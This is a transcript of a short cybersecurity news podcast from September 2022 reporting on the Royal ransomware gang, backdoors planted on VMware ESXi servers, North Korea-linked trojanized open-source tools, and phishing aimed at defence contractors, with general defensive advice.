A new ransomware gang discovered, attacks on virtual servers and more.
Welcome to Cyber Security Today. It’s Friday, September 30th, 2022. I’m Howard Solomon, contributing reporter on cybersecurity for ITWorldCanada.com.
A new ransomware gang has been making its presence felt. According to the Bleeping Computer news service, the gang calls itself Royal and has been quietly operating since the begining of the year. It uses several tactics to initially infect victim organizations. One is an email claiming the employee is using a trial version of software and needs to phone a number to cancel the subscription. Those who call get a gang member trying to convince them to install remote access software. Another tactic is finding a vulnerability in a company’s web application.
A threat actor is trying to take advantage of weakly protected WMware and Windows systems running virtual servers. Researchers at Mandiant have found a malware ecosystem supporting an unknown group that is trying to install backdoors on VMware ESXi hypervisors. They do it through the installation of malicious vSphere Installation Bundles. These are collections of files to help software distribution and virtual system management. It’s important to note that the attacker needs admin-level privileges to the ESXi hypervisor before they can deploy this malware. So it’s important that VMware administrators follow recommended steps to harden their vSphere installations.
Compromised versions of open source software utilities such as PuTTY, KiTTY, TightVNC, Sumatra PDF Reader and others are being used by a North Korean-based gang to spread malware in targeted organizations. That’s according to Microsoft, which says the gang has successfully compromised numerous organizations since June for espionage, data theft, financial gain and network destruction. The group often initially connects with employees over LinkedIn, pretending to be job recruiters for various firms. Then, after establishing an online friendship, they convince victims to switch to using WhatsApp. After that they try to get victims to download files that lead to infection. Targeted people have been engineers and technical support staff working at defence, aerospace, media and IT companies in the U.S, the U.K. India and Russia. Microsoft dubs this group Zinc, and says it is associated with North Korean government.
Finally, an unnamed threat actor has been going after defence contractors who sell products to the U.S. military. Often victim employees fall for an email with an attachment that supposedly details the company’s benefits, according to researchers at Securonix. Employees at any organization, but especially those in critical industries, have to be repeatedly warned against downloading files even if they appear to come from a trusted email address. IT administrators have to deploy PowerShell script block logging to help prevent PowerShell from being used as a malware deployment tool. They should also install Windows sysmon monitoring tool.
That’s it for this morning. However, later today the Week in Review will be out with a discussion on Cybersecurity Awareness Month.
Follow Cyber Security Today on Apple Podcasts, Google Podcasts or add us to your Flash Briefing on your smart speaker.